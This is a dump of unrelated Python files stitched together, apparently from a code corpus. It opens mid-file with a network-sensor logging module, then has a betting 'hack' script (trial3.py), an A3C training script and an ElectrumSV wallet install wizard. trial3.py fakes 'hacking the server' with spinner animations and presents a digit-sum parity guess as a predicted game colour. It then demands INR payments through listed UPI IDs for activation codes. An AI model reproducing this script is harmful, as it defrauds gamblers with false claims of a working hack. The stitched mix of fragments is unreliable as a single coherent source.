exit("[!] please rerun with sudo/Administrator privileges")
os.makedirs(config.LOG_DIR, 0755)
print("[i] using '%s' for log storage" % config.LOG_DIR)
def get_event_log_handle(sec, flags=os.O_APPEND | os.O_CREAT | os.O_WRONLY, reuse=True):
retval = None
localtime = time.localtime(sec)
_ = os.path.join(config.LOG_DIR, "%d-%02d-%02d.log" % (localtime.tm_year, localtime.tm_mon, localtime.tm_mday))
if not reuse:
if not os.path.exists(_):
open(_, "w+").close()
os.chmod(_, DEFAULT_EVENT_LOG_PERMISSIONS)
retval = os.open(_, flags)
else:
if _ != getattr(_thread_data, "event_log_path", None):
if getattr(_thread_data, "event_log_handle", None):
try:
os.close(_thread_data.event_log_handle)
except OSError:
pass
if not os.path.exists(_):
open(_, "w+").close()
os.chmod(_, DEFAULT_EVENT_LOG_PERMISSIONS)
_thread_data.event_log_path = _
_thread_data.event_log_handle = os.open(_thread_data.event_log_path, flags)
retval = _thread_data.event_log_handle
return retval
def get_error_log_handle(flags=os.O_APPEND | os.O_CREAT | os.O_WRONLY):
if not hasattr(_thread_data, "error_log_handle"):
_ = os.path.join(config.LOG_DIR, "error.log")
if not os.path.exists(_):
open(_, "w+").close()
os.chmod(_, DEFAULT_ERROR_LOG_PERMISSIONS)
_thread_data.error_log_path = _
_thread_data.error_log_handle = os.open(_thread_data.error_log_path, flags)
return _thread_data.error_log_handle
def safe_value(value):
retval = str(value or '-')
if any(_ in retval for _ in (' ', '"')):
retval = "\"%s\"" % retval.replace('"', '""')
retval = re.sub(r"[\x0a\x0d]", " ", retval)
return retval
def flush_condensed_events():
while True:
time.sleep(CONDENSED_EVENTS_FLUSH_PERIOD)
with _condensing_lock:
for key in _condensed_events:
condensed = False
events = _condensed_events[key]
first_event = events[0]
condensed_event = [_ for _ in first_event]
for i in xrange(1, len(events)):
current_event = events[i]
for j in xrange(3, 7): # src_port, dst_ip, dst_port, proto
if current_event[j] != condensed_event[j]:
condensed = True
if not isinstance(condensed_event[j], set):
condensed_event[j] = set((condensed_event[j],))
condensed_event[j].add(current_event[j])
if condensed:
for i in xrange(len(condensed_event)):
if isinstance(condensed_event[i], set):
condensed_event[i] = ','.join(str(_) for _ in sorted(condensed_event[i]))
log_event(condensed_event, skip_condensing=True)
_condensed_events.clear()
def log_event(event_tuple, packet=None, skip_write=False, skip_condensing=False):
global _condensing_thread
if _condensing_thread is None:
_condensing_thread = threading.Thread(target=flush_condensed_events)
_condensing_thread.daemon = True
_condensing_thread.start()
try:
sec, usec, src_ip, src_port, dst_ip, dst_port, proto, trail_type, trail, info, reference = event_tuple
if ignore_event(event_tuple):
return
if not (any(check_whitelisted(_) for _ in (src_ip, dst_ip)) and trail_type != TRAIL.DNS): # DNS requests/responses can't be whitelisted based on src_ip/dst_ip
if not skip_write:
localtime = "%s.%06d" % (time.strftime(TIME_FORMAT, time.localtime(int(sec))), usec)
if not skip_condensing:
if any(_ in info for _ in CONDENSE_ON_INFO_KEYWORDS):
with _condensing_lock:
key = (src_ip, trail)
if key not in _condensed_events:
_condensed_events[key] = []
_condensed_events[key].append(event_tuple)
return
current_bucket = sec / config.PROCESS_COUNT
if getattr(_thread_data, "log_bucket", None) != current_bucket: # log throttling
_thread_data.log_bucket = current_bucket
_thread_data.log_trails = set()
else:
if any(_ in _thread_data.log_trails for _ in ((src_ip, trail), (dst_ip, trail))):
return
else:
_thread_data.log_trails.add((src_ip, trail))
_thread_data.log_trails.add((dst_ip, trail))
event = "%s %s %s\n" % (safe_value(localtime), safe_value(config.SENSOR_NAME), " ".join(safe_value(_) for _ in event_tuple[2:]))
if not config.DISABLE_LOCAL_LOG_STORAGE:
handle = get_event_log_handle(sec)
os.write(handle, event)
if config.LOG_SERVER:
if config.LOG_SERVER.count(':') > 1:
remote_host, remote_port = config.LOG_SERVER.replace('[', '').replace(']', '').rsplit(':', 1)
# Reference: https://github.com/squeaky-pl/zenchmarks/blob/master/vendor/twisted/internet/tcp.py
_AI_NUMERICSERV = getattr(socket, "AI_NUMERICSERV", 0)
_NUMERIC_ONLY = socket.AI_NUMERICHOST | _AI_NUMERICSERV
_address = socket.getaddrinfo(remote_host, int(remote_port) if str(remote_port or "").isdigit() else 0, 0, 0, 0, _NUMERIC_ONLY)[0][4]
else:
remote_host, remote_port = config.LOG_SERVER.split(':')
_address = (remote_host, int(remote_port))
s = socket.socket(socket.AF_INET if len(_address) == 2 else socket.AF_INET6, socket.SOCK_DGRAM)
s.sendto("%s %s" % (sec, event), _address)
if config.SYSLOG_SERVER:
extension = "src=%s spt=%s dst=%s dpt=%s trail=%s ref=%s" % (src_ip, src_port, dst_ip, dst_port, trail, reference)
_ = CEF_FORMAT.format(syslog_time=time.strftime("%b %d %H:%M:%S", time.localtime(int(sec))), host=HOSTNAME, device_vendor=NAME, device_product="sensor", device_version=VERSION, signature_id=time.strftime("%Y-%m-%d", time.localtime(os.path.getctime(config.TRAILS_FILE))), name=info, severity=0, extension=extension)
remote_host, remote_port = config.SYSLOG_SERVER.split(':')
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s.sendto(_, (remote_host, int(remote_port)))
if config.DISABLE_LOCAL_LOG_STORAGE and not any(config.LOG_SERVER, config.SYSLOG_SERVER) or config.console:
sys.stderr.write(event)
sys.stderr.flush()
if config.plugin_functions:
for _ in config.plugin_functions:
_(event_tuple, packet)
except (OSError, IOError):
if config.SHOW_DEBUG:
traceback.print_exc()
def log_error(msg):
try:
handle = get_error_log_handle()
os.write(handle, "%s %s\n" % (time.strftime(TIME_FORMAT, time.localtime()), msg))
except (OSError, IOError):
if config.SHOW_DEBUG:
traceback.print_exc()
def start_logd(address=None, port=None, join=False):
class ThreadingUDPServer(SocketServer.ThreadingMixIn, SocketServer.UDPServer):
pass
class UDPHandler(SocketServer.BaseRequestHandler):
def handle(self):
try:
data, _ = self.request
sec, event = data.split(" ", 1)
handle = get_event_log_handle(int(sec), reuse=False)
os.write(handle, event)
os.close(handle)
except:
if config.SHOW_DEBUG:
traceback.print_exc()
# IPv6 support
if ':' in (address or ""):
address = address.strip("[]")
SocketServer.UDPServer.address_family = socket.AF_INET6
# Reference: https://github.com/squeaky-pl/zenchmarks/blob/master/vendor/twisted/internet/tcp.py
_AI_NUMERICSERV = getattr(socket, "AI_NUMERICSERV", 0)
_NUMERIC_ONLY = socket.AI_NUMERICHOST | _AI_NUMERICSERV
_address = socket.getaddrinfo(address, int(port) if str(port or "").isdigit() else 0, 0, 0, 0, _NUMERIC_ONLY)[0][4]
else:
_address = (address or '', int(port) if str(port or "").isdigit() else 0)
server = ThreadingUDPServer(_address, UDPHandler)
print "[i] running UDP server at '%s:%d'" % (server.server_address[0], server.server_address[1])
if join:
server.serve_forever()
else:
thread = threading.Thread(target=server.serve_forever)
thread.daemon = True
thread.start()
def set_sigterm_handler():
def handler(signum, frame):
log_error("SIGTERM")
raise SystemExit
if hasattr(signal, "SIGTERM"):
signal.signal(signal.SIGTERM, handler)
if __name__ != "__main__":
set_sigterm_handler()
|
trial3.py | #!/usr/bin/python
# -*- coding: UTF-8 -*-
from os import system, name
import itertools
import threading
import time
import sys
import datetime
from base64 import b64decode,b64encode
from datetime import date
expirydate = datetime.date(2021, 9, 24)
#expirydate = datetime.date(2021, 8, 30)
today=date.today()
green="\033[3;32m"
neon="\033[3;36m"
nc="\033[00m"
red="\033[3;31m"
purple="\033[3;34m"
yellow="\033[3;33m"
voilet="\033[3;35m"
def hero():
def chalo():
done = False
#here is the animation
def animate():
for c in itertools.cycle(['|', '/', '-', '\\']) :
if done:
break
sys.stdout.write('\rhacking in the bcone server for next colour--------- ' + c)
sys.stdout.flush()
time.sleep(0.1)
sys.stdout.write('\rDone! ')
t = threading.Thread(target=animate)
t.start()
#long process here
time.sleep(20)
done = True
def chalo1():
done = False
#here is the animation
def animate():
for c in itertools.cycle(['|', '/', '-', '\\']):
if done:
break
sys.stdout.write('\rgetting the colour wait --------- ' + c)
sys.stdout.flush()
time.sleep(0.1)
sys.stdout.write('\rDone! ')
t = threading.Thread(target=animate)
t.start()
#long process here
time.sleep(20)
done = True
def clear():
# for windows
if name == 'nt':
_ = system('cls')
# for mac and linux(here, os.name is 'posix')
else:
_ = system('clear')
def getSum(n):
sum=0
for digit in str(n):
sum+= int(digit)
return sum
clear()
y=1
newperiod=period
banner='figlet RXCEV2.1|lolcat'
numbers=[]
while(y):
clear()
system(banner)
print(f"{red}Contact me on telegram @smsn_knt")
print(f"{yellow}Enter ",newperiod," Bcone Price :")
current=input()
current=int(current)
chalo()
print("\n---------Successfully hacked the server-----------")
chalo1()
print("\n---------Successfully got the colour -------------")
print('\n')
last2=str(current)[-2:]
#samjha_maadarchod=lawde_time_pe_khel(last2)
if(newperiod%2==0):
sum=getSum(current)
if(sum%2==0):
print(newperiod+1," : 🔴, RED")
else:
print(newperiod+1," : 🟢, GREEN")
else:
sum=getSum(current)
if(sum%2==0):
print(newperiod+1," : 🔴, RED")
else:
print(newperiod+1," : 🟢, GREEN")
newperiod+=1
numbers.append(current)
y=input("Do you want to play : Press 1 and 0 to exit \n")
if(y==0):
y=False
if (len(numbers)>11):
clear()
system('figlet Thank you!!')
print("Play on next specified time!!")
print("-----------Current Time UP----------")
sys.exit(" \n \n \n Contact on Telegram @smsn_knt")
#print(numbers)
if(expirydate>today):
now = datetime.datetime.now()
First = now.replace(hour=13, minute=55, second=0, microsecond=0)
Firstend = now.replace(hour=14, minute=35, second=0, microsecond=0)
Second = now.replace(hour=16, minute=25, second=0, microsecond=0)
Secondend = now.replace(hour=17, minute=35, second=0, microsecond=0)
Third = now.replace(hour=15, minute=55, second=0, microsecond=0)
Thirdend = now.replace(hour=16, minute=35, second=0, microsecond=0)
Final = now.replace(hour=17, minute=55, second=0, microsecond=0)
Finalend = now.replace(hour=18, minute=35, second=0, microsecond=0)
if (now>Third and now<Thirdend):
period=320
hero()
elif(now):
period=340
hero()
elif(False):
period=340
hero()
elif(False):
period=360
hero()
else:
banner='figlet RXCEV2.1'
system(banner)
#print(f"{red}"Hi!! Thanks for buying the hack")
print("Hi! thanks for trying our DEMO")
print("----------Your play time-----------")
#print("31st Aug 2021, 11:00 AM- 11:30 AM")
#print("31st Aug 2021, 02:00 PM- 02:30 PM")
print("23rd Sept 2021, 04:00 PM- 04:30 PM")
#print("31st Aug 2021, 08:00 PM- 08:30 PM")
print("Please play on the given time, and ")
print("If you think it is an error contact")
print(" admin on telegram @smsn_knt ")
else:
def clear():
# for windows
if name == 'nt':
_ = system('cls')
# for mac and linux(here, os.name is 'posix')
else:
_ = system('clear')
code="BART983"
test="PBHGY32"
night="NICMJY13"
nextday="NNMKJHFD"
banner='figlet RXCEV2.1|lolcat'
rava=0
now = datetime.datetime.now()
Second = now.replace(hour=10, minute=55, second=0, microsecond=0)
Secondend = now.replace(hour=14, minute=55, second=0, microsecond=0)
Third = now.replace(hour=15, minute=30, second=0, microsecond=0)
Thirdend = now.replace(hour=18, minute=34, second=0, microsecond=0)
Final = now.replace(hour=18, minute=35, second=0, microsecond=0)
Finalend = now.replace(hour=22, minute=35, second=0, microsecond=0)
if(now>Second and now<Secondend):
rava=290
elif(now>Third and now<Thirdend):
rava=350
elif(now>Final and now<Finalend):
rava=410
system(banner)
print(f"{neon}*--------*--------*-------*---------*---------*")
print("Your hack has expired--- Please contact")
print(" on telegram ----@smsn_knt for activating")
print(" Plan Amount -- Total limit " )
print(" 1. 1000 INR ------- 1 Day (30 Games")
print(" 2. 2500 INR ------- 3 Days(90 Games")
print(" 2. 5000 INR ------- 7 Days(210 Games")
print("*---------*----------*-------------*----------*")
print("If you need any discount contact me")
print("Beware of fraudsters!!!")
while(True):
print("My banking name is SUNNY KUMAR")
print(f"{red}After You Pay to The UPI ID above You Can Automatically")
print(f"Activate Hack By Entering The Correct ")
print(f"{green}(UTR) Or Upi Reference Number")
print(f"{neon}To Activate The Hack")
print(f"If It Does'nt Open Contact Me On Telegram {yellow}@smsn_knt")
print(f"{neon}*---------*----------*-------------*----------*")
print(f"{red}*---------*----------*-------------*----------*")
print("payhere--- UPI : ")
print(f"{yellow}UPI1 : sunny.9132@ybl")
print("UPI2 : sunnyk16@fbl")
print("If you have already paid to above UPI")
print(f"{neon}Enter Your Activation Code Or Upi Reference for Opening Hack")
bhai=input(": ")
if(bhai==code or bhai==test):
clear()
print(f"{purple}---------------Your play time----------------")
print("13th Jan 2021, 02:30 PM- 03:00 PM")
print("13th Jan 2021, 05:30 PM- 06:00 PM")
print("13th Jan 2021, 08:30 PM- 09:00 PM")
print("Please play on the given time, and ")
print(f"If you think it is an {red}error {yellow}contact {green}me ")
print(f"{neon}On Telegram {red}@smsn_knt")
print("wait.... starting....")
time.sleep(20)
period=rava
hero()
#print("Today Server is off RXCE try tomorrow ")
#rint(" of town, Tomorrow It will work as usual.")
#print(" Thank You!!")
#rint("To all the weekly members next week, cost will be ")
#print(" 4000 INR , because in this week 2 days off " )
#print("Thank You!! ")
sys.exit(" \n \n \n Contact on Telegram @smsn_knt")
elif(bhai==nextday):
clear()
banner='figlet RXCEV2.1|lolcat'
system(banner)
print("----------Your play time-----------")
print("8th-14th Dec 2021, 02:30 PM- 03:00 PM")
print("8th-14th Dec 2021, 06:00 PM- 06:30 PM")
print("8th-14th Dec 2021, 08:30 PM- 09:00 PM")
print("Please play on the given time, and ")
print("If you think it is an error contact")
print("wait.... starting....")
time.sleep(20)
period=rava
hero()
#period("Sorry too many people(>20) using hack in same time ")
sys.exit(" \n \n \n Contact on Telegram @smsn_knt")
elif(bhai==night):
clear()
print("----------Your play time-----------")
print("9th Dec 2021, 08:30 PM- 09:00 PM")
print("10th Dec 2021, 08:30 PM- 09:00 PM")
print("11th Dec 2021, 08:30 PM- 09:00 PM")
print("Please play on the given time, and ")
print("If you think it is an error contact")
print("wait.... starting....")
time.sleep(20)
period=410
hero()
sys.exit(" \n \n \n Contact on Telegram @smsn_knt")
else:
clear()
banner='figlet RXCEV2.1|lolcat'
system(banner)
print("Incorrect Activation Code :")
|
a3c.py | # -*- coding: utf-8 -*-
import tensorflow as tf
import threading
import numpy as np
import signal
import random
import math
import os
import time
from game_ac_network import GameACFFNetwork, GameACLSTMNetwork
from a3c_training_thread import A3CTrainingThread
from rmsprop_applier import RMSPropApplier
from constants import ACTION_SIZE
from constants import PARALLEL_SIZE
from constants import INITIAL_ALPHA_LOW
from constants import INITIAL_ALPHA_HIGH
from constants import INITIAL_ALPHA_LOG_RATE
from constants import MAX_TIME_STEP
from constants import CHECKPOINT_DIR
from constants import LOG_FILE
from constants import RMSP_EPSILON
from constants import RMSP_ALPHA
from constants import GRAD_NORM_CLIP
from constants import USE_GPU
from constants import USE_LSTM
def log_uniform(lo, hi, rate):
log_lo = math.log(lo)
log_hi = math.log(hi)
v = log_lo * (1-rate) + log_hi * rate
return math.exp(v)
device = "/cpu:0"
if USE_GPU:
device = "/gpu:0"
initial_learning_rate = log_uniform(INITIAL_ALPHA_LOW,
INITIAL_ALPHA_HIGH,
INITIAL_ALPHA_LOG_RATE)
global_t = 0
stop_requested = False
if USE_LSTM:
global_network = GameACLSTMNetwork(ACTION_SIZE, -1, device)
else:
global_network = GameACFFNetwork(ACTION_SIZE, -1, device)
training_threads = []
learning_rate_input = tf.placeholder("float")
grad_applier = RMSPropApplier(learning_rate = learning_rate_input,
decay = RMSP_ALPHA,
momentum = 0.0,
epsilon = RMSP_EPSILON,
clip_norm = GRAD_NORM_CLIP,
device = device)
for i in range(PARALLEL_SIZE):
training_thread = A3CTrainingThread(i, global_network, initial_learning_rate,
learning_rate_input,
grad_applier, MAX_TIME_STEP,
device = device)
training_threads.append(training_thread)
# prepare session
sess = tf.Session(config=tf.ConfigProto(log_device_placement=False,
allow_soft_placement=True))
init = tf.global_variables_initializer()
sess.run(init)
# summary for tensorboard
score_input = tf.placeholder(tf.int32)
tf.summary.scalar("score", score_input)
summary_op = tf.summary.merge_all()
summary_writer = tf.summary.FileWriter(LOG_FILE, sess.graph)
# init or load checkpoint with saver
saver = tf.train.Saver()
checkpoint = tf.train.get_checkpoint_state(CHECKPOINT_DIR)
if checkpoint and checkpoint.model_checkpoint_path:
saver.restore(sess, checkpoint.model_checkpoint_path)
print("checkpoint loaded:", checkpoint.model_checkpoint_path)
tokens = checkpoint.model_checkpoint_path.split("-")
# set global step
global_t = int(tokens[1])
print(">>> global step set: ", global_t)
# set wall time
wall_t_fname = CHECKPOINT_DIR + '/' + 'wall_t.' + str(global_t)
with open(wall_t_fname, 'r') as f:
wall_t = float(f.read())
else:
print("Could not find old checkpoint")
# set wall time
wall_t = 0.0
def train_function(parallel_index):
global global_t
training_thread = training_threads[parallel_index]
# set start_time
start_time = time.time() - wall_t
training_thread.set_start_time(start_time)
while True:
if stop_requested:
break
if global_t > MAX_TIME_STEP:
break
diff_global_t = training_thread.process(sess, global_t, summary_writer,
summary_op, score_input)
global_t += diff_global_t
def signal_handler(signal, frame):
global stop_requested
print('You pressed Ctrl+C!')
stop_requested = True
train_threads = []
for i in range(PARALLEL_SIZE):
train_threads.append(threading.Thread(target=train_function, args=(i,)))
signal.signal(signal.SIGINT, signal_handler)
# set start time
start_time = time.time() - wall_t
for t in train_threads:
t.start()
print('Press Ctrl+C to stop')
signal.pause()
print('Now saving data. Please wait')
for t in train_threads:
t.join()
if not os.path.exists(CHECKPOINT_DIR):
os.mkdir(CHECKPOINT_DIR)
# write wall time
wall_t = time.time() - start_time
wall_t_fname = CHECKPOINT_DIR + '/' + 'wall_t.' + str(global_t)
with open(wall_t_fname, 'w') as f:
f.write(str(wall_t))
saver.save(sess, CHECKPOINT_DIR + '/' + 'checkpoint', global_step = global_t)
|
installwizard.py | import os
import shutil
import threading
from PyQt5.QtCore import Qt, pyqtSignal, QEventLoop, QRect
from PyQt5.QtGui import QPalette, QPen, QPainter
from PyQt5.QtWidgets import (
QWidget, QDialog, QLabel, QPushButton, QScrollArea, QHBoxLayout, QVBoxLayout, QListWidget,
QAbstractItemView, QListWidgetItem, QLineEdit, QFileDialog, QMessageBox, QSlider,
QGridLayout
)
from electrumsv.app_state import app_state
from electrumsv.base_wizard import BaseWizard
from electrumsv.exceptions import UserCancelled, InvalidPassword
from electrumsv.i18n import _
from electrumsv.logs import logs
from electrumsv.platform import platform
from electrumsv.storage import WalletStorage
from electrumsv.util import get_electron_cash_user_dir
from electrumsv.wallet import Wallet
from .network_dialog import NetworkChoiceLayout
from .password_dialog import PasswordLayout, PW_NEW, PasswordLineEdit
from .seed_dialog import SeedLayout, KeysLayout
from .util import MessageBoxMixin, Buttons, WWLabel, ChoicesLayout, read_QIcon
logger = logs.get_logger('wizard')
class GoBack(Exception):
pass
MSG_GENERATING_WAIT = _("ElectrumSV is generating your addresses, please wait...")
MSG_ENTER_ANYTHING = _("Please enter a seed phrase, a master key, a list of "
"Bitcoin addresses, or a list of private keys")
MSG_ENTER_SEED_OR_MPK = _("Please enter a seed phrase or a master key (xpub or xprv):")
MSG_COSIGNER = _("Please enter the master public key of cosigner #{}:")
MSG_ENTER_PASSWORD = _("Choose a password to encrypt your wallet keys.") + '\n'\
+ _("Leave this field empty if you want to disable encryption.")
MSG_RESTORE_PASSPHRASE = \
_("Please enter your seed derivation passphrase. "
"Note: this is NOT your encryption password. "
"Leave this field empty if you did not use one or are unsure.")
class CosignWidget(QWidget):
size = 120
def __init__(self, m, n):
QWidget.__init__(self)
self.R = QRect(0, 0, self.size, self.size)
self.setGeometry(self.R)
self.setMinimumHeight(self.size)
self.setMaximumHeight(self.size)
self.m = m
self.n = n
def set_n(self, n):
self.n = n
self.update()
def set_m(self, m):
self.m = m
self.update()
def paintEvent(self, event):
bgcolor = self.palette().color(QPalette.Background)
pen = QPen(bgcolor, 7, Qt.SolidLine)
qp = QPainter()
qp.begin(self)
qp.setPen(pen)
qp.setRenderHint(QPainter.Antialiasing)
qp.setBrush(Qt.gray)
for i in range(self.n):
alpha = int(16* 360 * i/self.n)
alpha2 = int(16* 360 * 1/self.n)
qp.setBrush(Qt.green if i<self.m else Qt.gray)
qp.drawPie(self.R, alpha, alpha2)
qp.end()
def wizard_dialog(func):
def func_wrapper(*args, **kwargs):
run_next = kwargs.get('run_next')
wizard = args[0]
wizard.back_button.setText(_(MSG_BUTTON_BACK) if wizard.can_go_back()
else _(MSG_BUTTON_CANCEL))
try:
out = func(*args, **kwargs)
except GoBack:
if wizard.can_go_back():
wizard.go_back()
else:
wizard.close()
return
except UserCancelled:
return
if run_next is not None:
if type(out) is not tuple:
out = (out,)
run_next(*out)
return func_wrapper
MSG_BUTTON_NEXT = "Next"
MSG_BUTTON_BACK = "Back"
MSG_BUTTON_CANCEL = "Cancel"
# WindowModalDialog must come first as it overrides show_error
class InstallWizard(QDialog, MessageBoxMixin, BaseWizard):
accept_signal = pyqtSignal()
synchronized_signal = pyqtSignal(str)
def __init__(self, storage):
BaseWizard.__init__(self, storage)
QDialog.__init__(self, None)
self.setWindowTitle('ElectrumSV')
self.setWindowIcon(read_QIcon("electrum-sv.png"))
self.language_for_seed = app_state.config.get('language')
self.setMinimumSize(600, 420)
self.accept_signal.connect(self.accept)
self.back_button = QPushButton(_(MSG_BUTTON_BACK), self)
self.back_button.setText(_(MSG_BUTTON_BACK) if self.can_go_back() else _(MSG_BUTTON_CANCEL))
self.next_button = QPushButton(_(MSG_BUTTON_NEXT), self)
self.next_button.setDefault(True)
self.icon_filename = None
self.loop = QEventLoop()
self.rejected.connect(lambda: self.loop.exit(0))
self.back_button.clicked.connect(lambda: self.loop.exit(1))
self.next_button.clicked.connect(lambda: self.loop.exit(2))
self.scroll_widget = QWidget()
self.scroll_widget.setLayout(self.create_template_layout())
scroll = QScrollArea()
scroll.setWidget(self.scroll_widget)
scroll.setHorizontalScrollBarPolicy(Qt.ScrollBarAlwaysOff)
scroll.setWidgetResizable(True)
outer_vbox = QVBoxLayout(self)
outer_vbox.addWidget(scroll)
outer_vbox.addLayout(Buttons(self.back_button, self.next_button))
self.show()
self.raise_()
self.refresh_gui() # Need for QT on MacOSX. Lame.
def create_template_layout(self):
"""
The standard layout divides creates a three part template.
"""
self.title = QLabel()
self.main_widget = QWidget()
self.please_wait = QLabel(_("Please wait..."))
self.please_wait.setAlignment(Qt.AlignCenter)
vbox = QVBoxLayout()
vbox.addWidget(self.title)
vbox.addWidget(self.main_widget)
vbox.addStretch(1)
vbox.addWidget(self.please_wait)
vbox.addStretch(1)
return vbox
def start_gui(self, is_startup=False):
if is_startup:
self._copy_electron_cash_wallets()
return self.run_and_get_wallet()
def _copy_electron_cash_wallets(self):
"""
Work out whether we should show UI to offer to copy the user's
Electron Cash wallets to their ElectrumSV wallet directory, and
if so, show it and give them the chance.
"""
def ignore_wallet_file(wallet_path):
if os.path.isdir(wallet_path):
return True
if wallet_path.startswith("."):
return True
return False
def count_user_wallets(wallets_path):
if os.path.exists(wallets_path):
filenames = [filename for filename in os.listdir(wallets_path)
if not ignore_wallet_file(os.path.join(wallets_path, filename))]
return len(filenames)
return 0
# If the user has ElectrumSV wallets already, we do not offer to copy the one's
# Electron Cash has.
esv_wallets_dir = os.path.join(platform.user_dir(), "wallets")
if count_user_wallets(esv_wallets_dir) > 0:
return
ec_wallets_dir = get_electron_cash_user_dir(esv_wallets_dir)
ec_wallet_count = count_user_wallets(ec_wallets_dir)
# If the user does not have Electron Cash wallets to copy, there's no point in offering.
if ec_wallet_count == 0:
return
def update_summary_label():
selection_count = len(file_list.selectedItems())
if selection_count == 0:
summary_label.setText(_("No wallets are selected / will be copied."))
elif selection_count == 1:
summary_label.setText(_("1 wallet is selected / will be copied."))
else:
summary_label.setText(_("%d wallets are selected / will be copied.")
% selection_count)
wallet_filenames = sorted(os.listdir(ec_wallets_dir), key=lambda s: s.lower())
file_list = QListWidget()
file_list.setSelectionMode(QAbstractItemView.ExtendedSelection)
for filename in wallet_filenames:
if not ignore_wallet_file(os.path.join(ec_wallets_dir, filename)):
file_list.addItem(QListWidgetItem(filename))
file_list.itemSelectionChanged.connect(update_summary_label)
vbox = QVBoxLayout()
introduction_label = QLabel(
_("Your Electron Cash wallet directory was found. If you want ElectrumSV to import "
"any of them on your behalf, select the ones you want copied from the list below "
"before clicking the Next button."))
introduction_label.setWordWrap(True)
vbox.setSpacing(20)
vbox.addWidget(introduction_label)
vbox.addWidget(file_list)
summary_label = QLabel()
update_summary_label()
vbox.addWidget(summary_label)
self._set_standard_layout(vbox, title=_('Import Electron Cash wallets'))
v = self.loop.exec_()
# Cancel, exit application.
if v == -1:
raise UserCancelled()
if v != 2:
raise GoBack()
# If the user selected any files, then we copy them before exiting to the next page.
for item in file_list.selectedItems():
filename = item.text()
source_path = os.path.join(ec_wallets_dir, filename)
target_path = os.path.join(esv_wallets_dir, filename)
try:
shutil.copyfile(source_path, target_path)
except shutil.Error:
# For now we ignore copy errors.
pass
def run_and_get_wallet(self):
vbox = QVBoxLayout()
hbox = QHBoxLayout()
hbox.addWidget(QLabel(_('Wallet') + ':'))
self.name_e = QLineEdit()
hbox.addWidget(self.name_e)
button = QPushButton(_('Choose...'))
hbox.addWidget(button)
vbox.addLayout(hbox)
self.msg_label = QLabel('')
vbox.addWidget(self.msg_label)
hbox2 = QHBoxLayout()
self.pw_e = PasswordLineEdit()
self.pw_e.setMinimumWidth(200)
self.pw_label = QLabel(_('Password') + ':')
self.pw_label.setAlignment(Qt.AlignTop)
hbox2.addWidget(self.pw_label)
hbox2.addWidget(self.pw_e)
hbox2.addStretch()
vbox.addLayout(hbox2)
self._set_standard_layout(vbox,
title=_('ElectrumSV wallet'),
back_text=_(MSG_BUTTON_CANCEL))
wallet_folder = os.path.dirname(self.storage.path)
def on_choose():
path, __ = QFileDialog.getOpenFileName(self, "Select your wallet file", wallet_folder)
if path:
self.name_e.setText(path)
def on_filename(filename):
path = os.path.join(wallet_folder, filename)
try:
self.storage = WalletStorage(path, manual_upgrades=True)
self.next_button.setEnabled(True)
except IOError:
self.storage = None
self.next_button.setEnabled(False)
if self.storage:
if not self.storage.file_exists():
msg =_("This file does not exist.") + '\n' \
+ _("Press 'Next' to create this wallet, or choose another file.")
pw = False
elif self.storage.file_exists() and self.storage.is_encrypted():
msg = '\n'.join([
_("This file is encrypted."),
_('Enter your password or choose another file.'),
])
pw = True
else:
msg = _("Press 'Next' to open this wallet.")
pw = False
else:
msg = _('Cannot read file')
pw = False
self.msg_label.setText(msg)
if pw:
self.pw_label.show()
self.pw_e.show()
self.pw_e.setFocus()
else:
self.pw_label.hide()
self.pw_e.hide()
button.clicked.connect(on_choose)
self.name_e.textChanged.connect(on_filename)
n = os.path.basename(self.storage.path)
self.name_e.setText(n)
while True:
if self.storage.file_exists() and not self.storage.is_encrypted():
break
if self.loop.exec_() != 2: # 2 = next
return
if not self.storage.file_exists():
break
if self.storage.file_exists() and self.storage.is_encrypted():
password = self.pw_e.text()
try:
self.storage.decrypt(password)
self.pw_e.setText('')
break
except InvalidPassword as e:
QMessageBox.information(None, _('Error'), str(e))
continue
except Exception as e:
logger.exception("decrypting storage")
QMessageBox.information(None, _('Error'), str(e))
return
path = self.storage.path
if self.storage.requires_split():
self.hide()
msg = _("The wallet '{}' contains multiple accounts, which are not supported.\n\n"
"Do you want to split your wallet into multiple files?").format(path)
if not self.question(msg):
return
file_list = '\n'.join(self.storage.split_accounts())
msg = (_('Your accounts have been moved to') + ':\n' + file_list + '\n\n' +
_('Do you want to delete the old file') + ':\n' + path)
if self.question(msg):
os.remove(path)
self.show_warning(_('The file was removed'))
return
if self.storage.requires_upgrade():
self.hide()
msg = _("The format of your wallet '%s' must be upgraded for ElectrumSV. "
"This change will not be backward compatible" % path)
if not self.question(msg):
return
self.storage.upgrade()
self.wallet = Wallet(self.storage)
return self.wallet
action = self.storage.get_action()
if action and action != 'new':
self.hide()
msg = _("The file '{}' contains an incompletely created wallet.\n"
"Do you want to complete its creation now?").format(path)
if not self.question(msg):
if self.question(_("Do you want to delete '{}'?").format(path)):
os.remove(path)
self.show_warning(_('The file was removed'))
return
self.show()
if action:
# self.wallet is set in run
self.run(action)
return self.wallet
self.wallet = Wallet(self.storage)
return self.wallet
def finished(self):
"""Called in hardware client wrapper, in order to close popups."""
return
def on_error(self, exc_info):
if not isinstance(exc_info[1], UserCancelled):
logger.exception("")
self.show_error(str(exc_info[1]))
def _remove_layout_from_widget(self, widget):
"""
The only way to remove a layout from a first widget, is to transfer it to a second one.
This needs to be done, to be able to set a new layout on the first widget.
"""
existing_layout = widget.layout()
QWidget().setLayout(existing_layout)
def _set_layout(self, layout, next_enabled=True, back_text=None):
"""
Set a layout that is in control of the whole display area.
"""
self._remove_layout_from_widget(self.scroll_widget)
self.scroll_widget.setLayout(layout)
self.back_button.setEnabled(True)
if back_text is not None:
self.back_button.setText(back_text)
self.next_button.setEnabled(next_enabled)
if next_enabled:
self.next_button.setFocus()
def _set_standard_layout(self, layout, title=None, next_enabled=True, back_text=None):
"""
Ensure the standard template layout is in place.
And put the current stage's sub-layout in the defined place.
"""
self._remove_layout_from_widget(self.scroll_widget)
self.scroll_widget.setLayout(self.create_template_layout())
self.title.setText("<b>%s</b>"%title if title else "")
self.title.setVisible(bool(title))
self.main_widget.setLayout(layout)
if back_text is None:
self.back_button.setText(_(MSG_BUTTON_BACK))
else:
self.back_button.setText(back_text)
self.back_button.setEnabled(True)
self.next_button.setText(_(MSG_BUTTON_NEXT))
self.next_button.setEnabled(next_enabled)
if next_enabled:
self.next_button.setFocus()
self.main_widget.setVisible(True)
self.please_wait.setVisible(False)
def exec_layout(self, layout, title=None, raise_on_cancel=True,
next_enabled=True):
self._set_standard_layout(layout, title, next_enabled)
result = self.loop.exec_()
if not result and raise_on_cancel:
raise UserCancelled
if result == 1:
raise GoBack
self.title.setVisible(False)
